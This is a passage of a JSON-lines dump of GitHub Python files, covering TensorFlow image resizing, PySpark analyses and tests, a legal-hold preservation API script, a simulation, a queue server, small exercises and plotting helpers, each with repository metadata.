[channel, height, width].\n We support this case because for some instance segmentation dataset, the\n instance segmentation is saved as [num_instances, height, width].\n scope: Optional name scope.\n method: Image resize method. 
Defaults to tf.image.ResizeMethod.BILINEAR.\n\n Returns:\n A 3-D tensor of shape [new_height, new_width, channels], where the image\n has been resized (with the specified method) so that\n min(new_height, new_width) == ceil(min_size) or\n max(new_height, new_width) == ceil(max_size).\n Raises:\n ValueError: If the image is not a 3D tensor.\n \"\"\"\n with tf.name_scope(scope, 'resize_to_range', [image]):\n new_tensor_list = []\n min_size = tf.to_float(min_size)\n if max_size is not None:\n max_size = tf.to_float(max_size)\n # Modify the max_size to be a multiple of factor plus 1 and make sure the\n # max dimension after resizing is no larger than max_size.\n if factor is not None:\n max_size = (\n max_size + (factor - (max_size - 1) % factor) % factor - factor)\n\n [orig_height, orig_width, _] = resolve_shape(image, rank=3)\n orig_height = tf.to_float(orig_height)\n orig_width = tf.to_float(orig_width)\n orig_min_size = tf.minimum(orig_height, orig_width)\n\n # Calculate the larger of the possible sizes\n large_scale_factor = min_size / orig_min_size\n large_height = tf.to_int32(tf.ceil(orig_height * large_scale_factor))\n large_width = tf.to_int32(tf.ceil(orig_width * large_scale_factor))\n large_size = tf.stack([large_height, large_width])\n\n new_size = large_size\n if max_size is not None:\n # Calculate the smaller of the possible sizes, use that if the larger\n # is too big.\n orig_max_size = tf.maximum(orig_height, orig_width)\n small_scale_factor = max_size / orig_max_size\n small_height = tf.to_int32(tf.ceil(orig_height * small_scale_factor))\n small_width = tf.to_int32(tf.ceil(orig_width * small_scale_factor))\n small_size = tf.stack([small_height, small_width])\n new_size = tf.cond(\n tf.to_float(tf.reduce_max(large_size)) >\n max_size, lambda: small_size, lambda: large_size)\n # Ensure that both output sides are multiples of factor plus one.\n if factor is not None:\n new_size += (factor - (new_size - 1) % factor) % factor\n new_tensor_list.append(\n tf.image.resize_images(\n image, new_size, method=method, align_corners=align_corners))\n if label is not None:\n if label_layout_is_chw:\n # Input label has shape [channel, height, width].\n resized_label = tf.expand_dims(label, 3)\n resized_label = tf.image.resize_nearest_neighbor(\n resized_label, new_size, align_corners=align_corners)\n resized_label = tf.squeeze(resized_label, 3)\n else:\n # Input label has shape [height, width, channel].\n resized_label = tf.image.resize_images(\n label,\n new_size,\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR,\n align_corners=align_corners)\n new_tensor_list.append(resized_label)\n else:\n new_tensor_list.append(None)\n return new_tensor_list\n","repo_name":"google-research/google-research","sub_path":"resolve_ref_exp_elements_ml/deeplab/preprocess_utils.py","file_name":"preprocess_utils.py","file_ext":"py","file_size_in_byte":14625,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"19050157598","text":"# Words combination\n# Create a program that reads an input string\n# and then creates and prints 5 random strings\n# from characters of the input string.\n# For example, the program obtained the word ‘hello’,\n# so it should print 5 random strings(words)\n# that combine characters ‘h’, ‘e’, ‘l’, ‘l’, ‘o’ -> ‘hlelo’, ‘olelh’, ‘loleh’ …\n# Tips: Use random module to get random char from string)\n\nimport random\n\ncollect_words = []\n\nbasic_word = input('Введіть своє слово: ')\nword_list = list(basic_word.lower())\n\nwhile 
len(collect_words) < 5:\n random.shuffle(word_list)\n one_word = ''.join(word_list)\n if (one_word not in collect_words) and (one_word != basic_word):\n collect_words.append(one_word)\n\nprint(*collect_words)\n","repo_name":"romanpovzyk/ba_python_tasks_04_","sub_path":"task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5349449600","text":"\"\"\"Task Manipulation.\"\"\"\n\nimport os\n\nimport numpy as np\nfrom PIL import Image\n\n\nclass Task(object):\n \"\"\"Task.\"\"\"\n\n def __init__(self, resources, duration, label):\n self.resources = resources\n self.duration = duration\n self.label = label\n self.dimension = len(resources)\n\n def summary(self, bg_shape=None):\n \"\"\"State representation.\"\"\"\n if bg_shape is None:\n bg_shape = (self.duration, max(self.resources))\n if self.dimension > 0:\n state_matrices = [np.full(bg_shape, 255, dtype=np.uint8) for i in range(self.dimension)]\n for i in range(self.dimension):\n for row in range(self.duration):\n for col in range(self.resources[i]):\n state_matrices[i][row, col] = 0\n temp = state_matrices[0]\n for i in range(1, self.dimension):\n temp = np.concatenate((temp, state_matrices[i]), axis=1)\n return temp\n else:\n return None\n\n def __repr__(self):\n return 'Task(resources={0}, duration={1}, label={2})'.format(self.resources, self.duration, self.label)\n\n","repo_name":"yxc135/deeprm-scheduler","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"99"} +{"seq_id":"3978340497","text":"from pyspark import SparkContext\nfrom pyspark.sql.session import SparkSession\nfrom pyspark.sql import functions as F\nfrom pyspark.sql.types import *\n\n# start spark with 1 worker thread\nsc = SparkContext(\"local[1]\")\nsc.setLogLevel(\"ERROR\")\n\nspark = SparkSession(sc)\n\n# 1) What is the distribution of the machines according to their CPU capacity?\n\n# machine_events schema\nmachineEventsSchema = StructType(\n [\n StructField(\"timestamp\", LongType(), True),\n StructField(\"machine_id\", StringType(), True),\n StructField(\"event_type\", StringType(), True),\n StructField(\"platfrom_id\", StringType(), True),\n StructField(\"capacity_cpu\", FloatType(), True),\n StructField(\"capacity_memory\", FloatType(), True),\n ]\n)\n\n# machine_events df\nmachineEventsDf = spark.read.schema(machineEventsSchema).csv(\n \"../data/machine_events/*.csv.gz\"\n)\n\ncpuCapacityCountDf = machineEventsDf.select(\"machine_id\", \"capacity_cpu\").distinct().where(\n F.col(\"capacity_cpu\").isNotNull()\n).groupBy(\"capacity_cpu\").count()\n\ncpuCapacityCountDf.coalesce(1).write.csv(\n \"../data/output/analysis1/machine_cpu_capacity_dist\", header=True, mode=\"overwrite\"\n)\n\n\n\n","repo_name":"asadwan/spark-project","sub_path":"code/analysis1.py","file_name":"analysis1.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74083279046","text":"from matminer.featurizers.base import BaseFeaturizer\n\nfrom .datasets import retrieve_dataset\nfrom .featurizers import create_featurizer\nfrom .task_updates import save_progress, save_result\nfrom .users import Users\nfrom .datasets import retrieve_dataset\n\n\nclass FeaturizerJob: \n \"\"\"Apply featurizer to a column and add the resulting column to the dataset\n 
\"\"\"\n def __init__(self, task_id: str, email: str) -> None:\n _, data = Users().read(email)\n self.email = email\n self.workflow = data[\"workflow\"]\n self.dataset = data[\"current_dataset\"]\n self.featurizer: BaseFeaturizer = create_featurizer(self.workflow.featurizer)\n\n # Load the dataset:\n # If there's an existing current_dataset, it's likely left-over from when the user selected a different featurizer\n self.dataset = retrieve_dataset(self.workflow.dataset)\n\n def featurize(self) -> str:\n \"\"\"Featurize column\n\n Returns:\n str: success message\n \"\"\"\n users = Users()\n\n save_progress(self.email, \"Starting to Featurize\")\n output_df = self.featurizer.featurize_dataframe(\n self.dataset, self.workflow.column_to_featurize, ignore_errors=True, return_errors=True, pbar=False\n )\n\n save_progress(self.email, \"Featurization Complete, Saving Results\")\n\n # save updated dataset to database\n users.update({\"email\": self.email, \"current_dataset\": output_df})\n\n save_result(self.email, {\"table\": \"users\", \"key\": self.email})\n\n return str(\"Featurized Column Created\")\n","repo_name":"zhaoqiwang1997/HackingMaterialsUI","sub_path":"src/backend/src/featurize_column.py","file_name":"featurize_column.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4861561650","text":"\"\"\" PySpark unit tests\n Create the input dataframe\n Create the output dataframe using the function we want to test\n Specify the expected output values\n Compare the results\n\"\"\"\n\nimport os\nimport pytest\nfrom src.main import Transformation, set_env_vars\nfrom chispa.dataframe_comparer import assert_df_equality\n\n\nset_env_vars()\ninput_path= os.getenv(\"input_path_dataset\")\ntransformer = Transformation(input_path)\n\n\n@pytest.mark.usefixtures('spark')\ndef test_read_file(spark):\n data = [{'name': 'Alice', 'id': \"1\"},{'name': 'Mario', 'id': \"2\"}]\n expected_df = spark.createDataFrame(data)\n transf = Transformation('dataset/test_dataset.csv')\n actual_df = transf.read_file()\n assert_df_equality(actual_df, expected_df, ignore_row_order=True,ignore_column_order=True)\n\n\n@pytest.mark.usefixtures('spark')\ndef test_apply_filters(spark):\n input_columns = [\n \"REPLACING-RENAULT-REF\", \"REPLACING-SUPPLIER-REF\", \"REPLACING-SUPPLIER-NAME\",\n \"REPLACED-RENAULT-REF\",\t\"REPLACED-SUPPLIER-REF\", \"REPLACEMENT-DATE\", \t\n ]\n input_data = [\n (None, '#N/A', 'SHELL', '8671013783', 'NOUVEAU', '03/11/2014'),\n (None, '#N/A', 'SHELL', 'xxx', 'NOUVEAU', '03/11/2014'),\n ('8660000025', '#N/A', 'SHELL', '8671013785', 'NOUVEAU','03/11/2014'),\n ('8660000710', '437444', 'Valeo', '8671000020', '#N/A','13/02/2019'),\n ('8660000710', '437444', 'Valeo', '8671000000', '#N/A','13/02/2018'),\n ('0', '#N/A', 'INCONNU AM', '8671000000', 'CONSOMMABLES','13/02/2014'),\n ('0', '#N/A', 'AWS', '8671000001', 'CONSOMMABLES', '13/02/2014'),\n ('8660000712', '#N/A', 'aws', '8671000002', 'CONSOMMABLES','13/02/2014'),\n ('8660000713', '#N/A', 'CLOUD', '8671000003', 'CONSOMMABLES','13/02/2014')\n ]\n input_df = spark.createDataFrame(input_data).toDF(*input_columns)\n output_columns = input_columns + [\"SHIPPING_DATE\"]\n output_data = [(\"8660000025\",\"EMPTY\",\"SHELL\",\"8671013785\",\"NOUVEAU\",\"03/11/2014\",\"2023\"), \n (\"8660000710\",\"437444\",\"Valeo\",\"8671000000\",\"EMPTY\",\"13/02/2018\",\"2024\"), \n (\"8660000713\",\"EMPTY\",\"CLOUD\",\"8671000003\",\"CONSOMMABLES\",\"13/02/2014\",\"2022\")]\n 
excepted_df = spark.createDataFrame(output_data).toDF(*output_columns)\n actual_df = transformer.apply_filters(dataset=input_df)\n assert_df_equality(actual_df, excepted_df)\n\n\n@pytest.mark.usefixtures('spark')\ndef test_save_dataframe_to_csv(spark):\n destination_path = 'dataset/output/test'\n data = [{'name': 'Alice', 'id': \"1\"},{'name': 'Mario', 'id': \"2\"}]\n expected_df = spark.createDataFrame(data)\n transformer.save_dataframe_to_csv(expected_df,destination_path)\n actual_df = spark.read.csv(destination_path,header=True)\n assert_df_equality(actual_df, expected_df, ignore_row_order=True)\n","repo_name":"ahmedR94/pyspark-tutorial","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71242039364","text":"# -*- encoding: utf-8 -*-\nimport argparse\nimport csv\nimport json\nimport requests\nimport sys\n\nfrom dateutil.parser import parse\n\n\nargparser = argparse.ArgumentParser(\n description=\"Create a Preservation in a workspace from Slack Enterprise Datasource\",\n epilog=\"You can also get a list of existing Slack Enterprise Datasources in your account\",\n)\nargparser.add_argument(\n \"--username\", required=True, type=str, help=\"Onna Account username\"\n)\nargparser.add_argument(\"--password\", required=True, type=str, help=\"password\")\nargparser.add_argument(\n \"--account\", required=True, type=str, help=\"The Onna account name\"\n)\nargparser.add_argument(\n \"--account_url\",\n required=True,\n type=str,\n help=\"The URL of your account, e.g https://company.onna.io or https://enterprise.onna.com\",\n)\nargparser.add_argument(\n \"--from_date\",\n type=str,\n help=\"Start date. Most date formats are accepted\",\n)\nargparser.add_argument(\n \"--to_date\",\n type=str,\n help=\"End date. 
Most date formats are accepted\",\n)\nargparser.add_argument(\n \"--container\", required=False, default=\"rel0\", help=\"Name of the account container\"\n)\nargparser.add_argument(\"--datasources\", nargs=\"+\", help=\"List of Datasource IDs\")\n\nargparser.add_argument(\n \"--list_datasources\",\n required=False,\n action=\"store_true\",\n help=\"Fetch Datasource IDs to include in the preservation\",\n)\n\n\ndef auth_code(url=None):\n if not url:\n raise Exception\n resp = requests.get(url)\n if resp.status_code == 200:\n return resp.json()[\"auth_code\"]\n\n\ndef auth_token(auth_code, username, password, scope, base_url):\n payload = {\n \"grant_type\": \"user\",\n \"code\": auth_code,\n \"username\": username,\n \"password\": password,\n \"scopes\": [scope],\n \"client_id\": \"canonical\",\n }\n headers = {\"Accept\": \"application/json\"}\n resp = requests.post(\n f\"{base_url}/auth/oauth/get_auth_token\",\n headers=headers,\n data=json.dumps(payload),\n )\n if resp.status_code == 200:\n jwt_token = resp.text\n return jwt_token\n\n\ndef open_file_and_parse(file_path):\n with open(file_path, \"r\") as f:\n text = f.read()\n json_text = json.loads(text)\n return json_text\n\n\ndef open_file_and_get_lines(file_path):\n with open(file_path, \"r\", encoding=\"utf8\") as f:\n content = f.readlines()\n content = [x.strip() for x in content]\n return content\n\n\ndef write_array_of_arrays_to_csv(array_info, output_file):\n with open(output_file, \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(array_info)\n\n\ndef write_array_to_file(array_info, output_file):\n with open(output_file, \"w\", newline=\"\\n\", encoding=\"utf8\") as f:\n for x in array_info:\n f.write(x)\n f.write(\"\\r\\n\")\n\n\ndef verification_request(emails, token, account_url):\n\n url = f\"{account_url}/@identitiesEmails\"\n\n payload = json.dumps(emails)\n\n headers = {\n \"authorization\": f\"Bearer {token}\",\n \"content-type\": \"application/json\",\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n if response.status_code == 200:\n return response.json()\n else:\n print(response.status_code)\n return None\n\n\ndef parse_response(response):\n found_emails = []\n for account in response.get(\"found\", []):\n for source_account in account.get(\"source_accounts\", []):\n found_emails.append(source_account.get(\"email\"))\n\n not_found_emails = [email for email in response.get(\"not_found\")]\n\n return found_emails, not_found_emails\n\n\n# Step 1\n# Verify emails have identities\n\n\ndef verify_emails(token, account_url):\n\n matters_and_emails = open_file_and_get_lines(\"matters_emails.csv\")\n\n matters_dict = dict()\n emails_dict = dict()\n\n for line in matters_and_emails:\n info = line.split(\",\")\n matter_name = info[0]\n email_address = info[1]\n\n if matter_name in matters_dict:\n existing_users = matters_dict[matter_name][\"emails\"]\n existing_users.append(email_address)\n else:\n matters_dict[matter_name] = {\"emails\": [email_address]}\n\n if info[1] in emails_dict:\n existing_matters = emails_dict[info[1]]\n existing_matters.append(matter_name)\n else:\n emails_dict[email_address] = [matter_name]\n\n # Batch email requests into groups of 1000\n email_batches = chunks(list(emails_dict.keys()), 1000)\n all_found_users = []\n all_not_found_users = []\n\n for email_batch in email_batches:\n verification_response = verification_request(email_batch, token, account_url)\n if verification_response is not None:\n found_users, not_found_users = 
parse_response(verification_response)\n else:\n print(\"invalid verification response\")\n found_users = []\n not_found_users = []\n all_found_users.extend(found_users)\n all_not_found_users.extend(not_found_users)\n\n # Write file with not found users and matters\n not_found_array = [[\"matter\", \"email\"]]\n for user in all_not_found_users:\n user_matters = emails_dict[user]\n for um in user_matters:\n not_found_array.append([um, user])\n\n write_array_of_arrays_to_csv(not_found_array, \"Users Not Found.csv\")\n\n return all_found_users, emails_dict, matters_dict\n\n\ndef get_email_identities(email_addresses, account_url, token):\n\n url = f\"{account_url}/@frontsearch\"\n\n payload = (\n '{\"advanced\":{\"and\":[{\"in\":[{\"var\":\"type_name\"},[\"RealIdentity\"]]},{\"in\":[{'\n '\"var\":\"from_mail.keyword\"},' + json.dumps(email_addresses) + \"]\"\n '}]},\"from\":0,\"sort\":{\"field\":\"title.keyword\",\"direction\":\"asc\"},\"includes\":[\"title\",'\n '\"from_mail\"],\"size\":' + str(len(email_addresses)) + \"} \"\n )\n headers = {\"authorization\": f\"Bearer {token}\", \"content-type\": \"application/json\"}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n return response.json()\n else:\n return None\n\n\ndef parse_email_identities(email_identities_resp):\n email_identities_dict = dict()\n for member in email_identities_resp[\"member\"]:\n if member[\"from_mail\"] not in email_identities_dict:\n email_identities_dict[member[\"from_mail\"]] = member[\"@uid\"]\n\n return email_identities_dict\n\n\ndef create_preservation(\n preservation_name, identities, sources, from_date, to_date, token, account_url\n):\n\n preservation_id = preservation_name.lower().replace(\" \", \"-\")\n preservation_id = preservation_id.replace(\".\", \"\")\n\n url = f\"{account_url}/workspaces\"\n\n raw_payload = {\n \"id\": preservation_id,\n \"@type\": \"Workspace\",\n \"title\": preservation_name,\n \"legal_hold\": {\n \"query\": {\n \"advanced\": {\n \"and\": [\n {\"in\": [{\"var\": \"parent_datasource.uuid\"}, sources]},\n {\"in\": [{\"var\": \"identity-member\"}, identities]},\n ]\n }\n }\n },\n }\n if from_date is not None:\n raw_payload[\"legal_hold\"][\"query\"][\"advanced\"][\"and\"].append(\n {\">\": [{\"var\": \"date_modified\"}, from_date]}\n )\n\n if to_date is not None:\n raw_payload[\"legal_hold\"][\"query\"][\"advanced\"][\"and\"].append(\n {\"<\": [{\"var\": \"date_modified\"}, to_date]}\n )\n\n payload = json.dumps(raw_payload)\n\n headers = {\n \"accept\": \"application/json\",\n \"authorization\": f\"Bearer {token}\",\n \"content-type\": \"application/json\",\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code == 201:\n trigger_smart_action(response.json(), token)\n\n\ndef trigger_smart_action(response, token):\n\n workspace_url = response.get(\"@id\", None)\n if workspace_url is not None:\n url = f\"{workspace_url}/@smartactionCheck\"\n\n payload = \"{}\"\n headers = {\"authorization\": f\"Bearer {token}\"}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n print(\"scheduled\")\n\n\ndef chunks(items, n):\n final = [items[i * n : (i + 1) * n] for i in range((len(items) + n - 1) // n)]\n return final\n\n\ndef get_slack_enterprise_sources(token, account_url):\n \"\"\"Parse only the Enterprise Slack sources to a CSV with the Title, creation date, and UUID\"\"\"\n url = 
f\"{account_url}/@data?types=SlackEDatasource\"\n\n payload = {}\n headers = {\n \"authorization\": f\"Bearer {token}\",\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n sources_array = []\n sources = response.json()\n for source in sources[\"updates\"]:\n sources_array.append(\n [source[\"title\"], source[\"@uid\"], source[\"creation_date\"]]\n )\n\n write_array_of_arrays_to_csv(sources_array, \"Slack Enterprise Sources.csv\")\n\n\ndef main():\n try:\n from_date = int(parse(args.from_date).timestamp())\n except (TypeError, ValueError):\n from_date = None\n try:\n to_date = int(parse(args.to_date).timestamp())\n except (TypeError, ValueError):\n to_date = None\n\n username = args.username\n password = args.password\n account = args.account\n base_url = args.account_url\n container = args.container\n\n account_url = f\"{base_url}/api/{container}/{account}\"\n\n auth_code_url = f\"{account_url}/@oauthgetcode?client_id=canonical&scope={account}\"\n code = auth_code(auth_code_url)\n token = auth_token(code, username, password, account, base_url)\n\n if args.list_datasources:\n get_slack_enterprise_sources(token, account_url)\n sys.exit(0)\n\n datasource_ids = args.datasources\n\n print(\"starting to verify emails\")\n emails, emails_to_matters, matters_info = verify_emails(token, account_url)\n print(\"starting to get identities\")\n email_identities_response = get_email_identities(emails, account_url, token)\n\n if email_identities_response is not None:\n email_identities_dictionary = parse_email_identities(email_identities_response)\n else:\n return\n\n for matter in matters_info.keys():\n matter_emails = matters_info[matter][\"emails\"]\n\n matter_identities = []\n for email in matter_emails:\n if email in email_identities_dictionary:\n matter_identities.append(email_identities_dictionary[email])\n\n matters_info[matter][\"identities\"] = matter_identities\n\n data_source_ids = datasource_ids\n\n for matter in matters_info.keys():\n matters_info[matter][\"sources\"] = data_source_ids\n\n matters_to_create = []\n for matter in matters_info.keys():\n matters_to_create.append(\n [\n matter,\n len(matters_info[matter][\"sources\"]),\n len(matters_info[matter][\"identities\"]),\n len(matters_info[matter][\"emails\"]),\n ]\n )\n write_array_of_arrays_to_csv(matters_to_create, \"matters_to_create.csv\")\n\n print(\"creating preservations\")\n count = 0\n for matter in matters_info.keys():\n count += 1\n print(f\"creating {str(count)} of {str(len(matters_info))}\")\n sources = matters_info[matter][\"sources\"]\n identities = matters_info[matter][\"identities\"]\n # from_date = None\n # to_date = None\n\n create_preservation(\n matter,\n identities,\n sources,\n from_date,\n to_date,\n token,\n account_url,\n )\n\n\nif __name__ == \"__main__\":\n args = argparser.parse_args()\n main()\n","repo_name":"onna/onna-tutorial-files","sub_path":"tutorials/datasources/create-preservation/create-preservation.py","file_name":"create-preservation.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26919411039","text":"nome= input ('digite seu nome ')\nidade= int(input ('qual a sua idade?'))\nrenda= int (input ('qual a sua renda? '))\nvalor_emprestimo= int (input ('qual o valor do empréstimo? 
'))\n\nif (renda> 1000) and (idade> 22 and idade> 55) and (valor_emprestimo>= 2000 and 15* renda):\n print ('Empréstimo APROVADO')\n\nelse:\n print ('Empréstimo RECUSADO')\n","repo_name":"Prietoisa/Python","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33309153574","text":"def get_cook_book():\n cook_book = {}\n name_key = ['ingredient_name', 'quantity', 'measure']\n with open('recipes.txt', encoding='utf-8') as file:\n for line in file:\n cook_book[line.strip()] = []\n ingredients_quantity = int(file.readline())\n for ingredient in range(ingredients_quantity):\n ingredient_list = file.readline().strip().split(' | ')\n cook_book[line.strip()] += [dict(zip(name_key, ingredient_list))]\n file.readline()\n return cook_book\n\n\ndef get_shop_list_by_dishes(dishes, person):\n cook_book = get_cook_book()\n shop_list = {}\n for dish in cook_book.keys():\n for name_dish in dishes:\n if dish == name_dish:\n get_ingredient_list(shop_list, cook_book[dish], person)\n\n return shop_list\n\n\ndef get_ingredient_list(shop_list, dish, person):\n for ingredient in dish:\n ingredient_name = ingredient['ingredient_name']\n measure = ingredient['measure']\n quantity = int(ingredient['quantity']) * person\n if len(shop_list) == 0:\n shop_list[ingredient_name] = {'measure': measure, 'quantity': quantity}\n else:\n quantity = get_new_quantity(shop_list, quantity, ingredient_name)\n shop_list[ingredient_name] = {'measure': measure, 'quantity': quantity}\n return shop_list\n\n\ndef get_new_quantity(shop_list, quantity, ingredient):\n ingredients_list = shop_list.keys()\n for ingredient_name in ingredients_list:\n if ingredient_name == ingredient:\n ingredient_dict = shop_list[ingredient]\n new_quantity = ingredient_dict['quantity'] + quantity\n return new_quantity\n return quantity\n\n\nprint(get_cook_book())\nprint(get_shop_list_by_dishes(['Омлет', 'Фахитос', 'Омлет'], 7))\n","repo_name":"sdstepanov/netology-ORW","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"70079118406","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nalpha = 0.08 \nc1 = 0.175\nc2 = .03\nb = 0.011\nd = .55\n\ndt = 1\nT = 800; time = np.arange(0, T, dt)\n\n\nphi0 = 0.2\nr0 = 0\nr, phi = np.zeros(int(T/dt)), np.zeros(int(T/dt))\n\nt = dt; i = 0;\nwhile t <= T:\n r1 = (b*phi0 + r0/dt)/(1/dt +b*d)\n\n # Semi-implicit #1 (strong)\n# phi1 = (phi0/dt - c2*r1)/(1/dt - c1*phi0 + c1*phi0*phi0 +c1*alpha - c1*alpha*phi0)\n # Semi-implicit #2 (weak) \n phi1 = (c1*phi0*phi0 - c1*phi0*phi0*phi0 + c1*alpha*phi0*phi0 - c2*r1 + phi0/dt)/(1/dt + c1*alpha)\n\n r[i] = r1;\n phi[i] = phi1; \n i = i + 1\n \n r0, phi0 = r1, phi1\n \n t = t + dt\n\nfig1 = plt.figure()\nplt.plot(time, phi, '-r', label = 'normalized potential')\nplt.plot(time, r, '-k', label = 'gating variable')\nplt.legend() \nplt.xlabel('time [ms]')\nplt.grid('on')\nplt.show()\n","repo_name":"daveb-dev/fibrosis","sub_path":"source/FHN_semiimp.py","file_name":"FHN_semiimp.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19723182218","text":"from multiprocessing.managers import BaseManager\nfrom multiprocessing import Queue\nimport os\n\nimport pandas as pd\n\n# consts\nroot_path = 
'/home/voyager/project/lz-graph/data/'\n\nnode_df = pd.read_csv(os.path.join(root_path, 'nodes.csv'))\ntype_list = node_df['CUSTOMTYPE']\n\nlink_df = pd.read_csv(os.path.join(root_path, 'stat_links.csv'))\nsource_list = link_df['source']\ntarget_list = link_df['target']\n\n# init data\ninit_dict = {\n 'node_count': len(type_list),\n 'source_list': source_list,\n 'target_list': target_list\n}\n\ntask_queue = Queue()\nresult_queue = Queue()\n\nclass QueueManager(BaseManager): pass\nQueueManager.register('get_task_queue', callable=lambda:task_queue)\nQueueManager.register('get_result_queue', callable=lambda:result_queue)\nQueueManager.register('get_init_dict', callable=lambda:init_dict)\n\nmanager = QueueManager(address=('0.0.0.0', 50000), authkey=b'asdfjkl;')\n\nserver = manager.get_server()\nserver.serve_forever()\n\nprint('listening')\n","repo_name":"Orientsoft/lz-graph","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19568770812","text":"# plotting\nimport seaborn as sns\nfrom zmq import EVENT_CLOSE_FAILED\nsns.set(font_scale=1)\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import lines\nfrom matplotlib import patches\nfrom matplotlib.patheffects import withStroke\nimport numpy as np\n\n# ML\nfrom sklearn.linear_model import LinearRegression\n\n# others\nimport life_quality_and_government.utils.paths as path\n\n\n# colors for bars, argentina is different color\nBLUE = \"#076fa2\"\nRED = \"#E3120B\"\nBLACK = \"#202020\"\nGREY = \"#aaaaaa\"\nGREEN = \"#07521f\"\nORANGE = \"#FF8B00ff\"\n\ndef barh_plot(countries, variable, title, sources, save_name, is_gdp=False):\n \"\"\"\n giving list of countries and a variable to plot, plot a horizontal bar plot with a fixed format.\n If is_gdp=True, a format of NNk will be used instead of the std range 0 to 1\n \"\"\"\n matplotlib.rc_file_defaults()\n\n \n colors = list()\n for country in countries:\n if country=='Argentina':\n colors.append(GREEN)\n elif country in ['Mean','Median']:\n colors.append(ORANGE)\n else:\n colors.append(BLUE)\n\n fig, ax = plt.subplots(figsize=(10, 10*0.625))\n ax.barh( countries,variable, height=0.7, align=\"center\", color=colors);\n ax.invert_yaxis();\n\n # tick params\n ax.xaxis.set_tick_params(labelbottom=True, length=0)\n ax.yaxis.set_tick_params( length=0)\n\n # Set whether axis ticks and gridlines are above or below most artists.\n ax.set_axisbelow(True)\n ax.grid(axis = \"x\", color=\"#A8BAC4\", lw=1.2)\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"bottom\"].set_visible(False)\n ax.spines[\"left\"].set_lw(1.5)\n\n # Hide y labels\n ax.yaxis.set_visible(False)\n\n # adding labels\n bar_range = max(variable) - min(variable)\n bar_max = max(variable)\n\n\n if is_gdp:\n for i, (country, variable) in enumerate(zip(countries, variable)):\n if variable > bar_max*0.3:\n plt.text(s=country, x=bar_max*0.025, y=i, color=\"w\", verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=variable*0.975, y=i, color=\"w\",\n verticalalignment=\"center\", horizontalalignment=\"right\", size=14, fontdict={'fontweight':'600'})\n else:\n if country=='Argentina':\n plt.text(s=country, x=variable*1.05, y=i, color=GREEN, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=bar_max*0.025, y=i, 
color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n elif country in ['Mean','Median']:\n plt.text(s=country, x=variable*1.05, y=i, color=ORANGE, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n else:\n plt.text(s=country, x=variable*1.05, y=i, color=BLUE, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n\n else:\n for i, (country, value) in enumerate(zip(countries, variable)):\n if value > bar_max*0.3:\n plt.text(s=country, x=bar_max*0.025, y=i, color=\"w\", verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=value*0.975, y=i, color=\"w\",\n verticalalignment=\"center\", horizontalalignment=\"right\", size=14, fontdict={'fontweight':'600'})\n else:\n if country=='Argentina':\n plt.text(s=country, x=value*1.025, y=i, color=GREEN, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n elif country in ['Mean','Median']:\n plt.text(s=country, x=value*1.025, y=i, color=ORANGE, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n else:\n plt.text(s=country, x=value*1.025, y=i, color=BLUE, 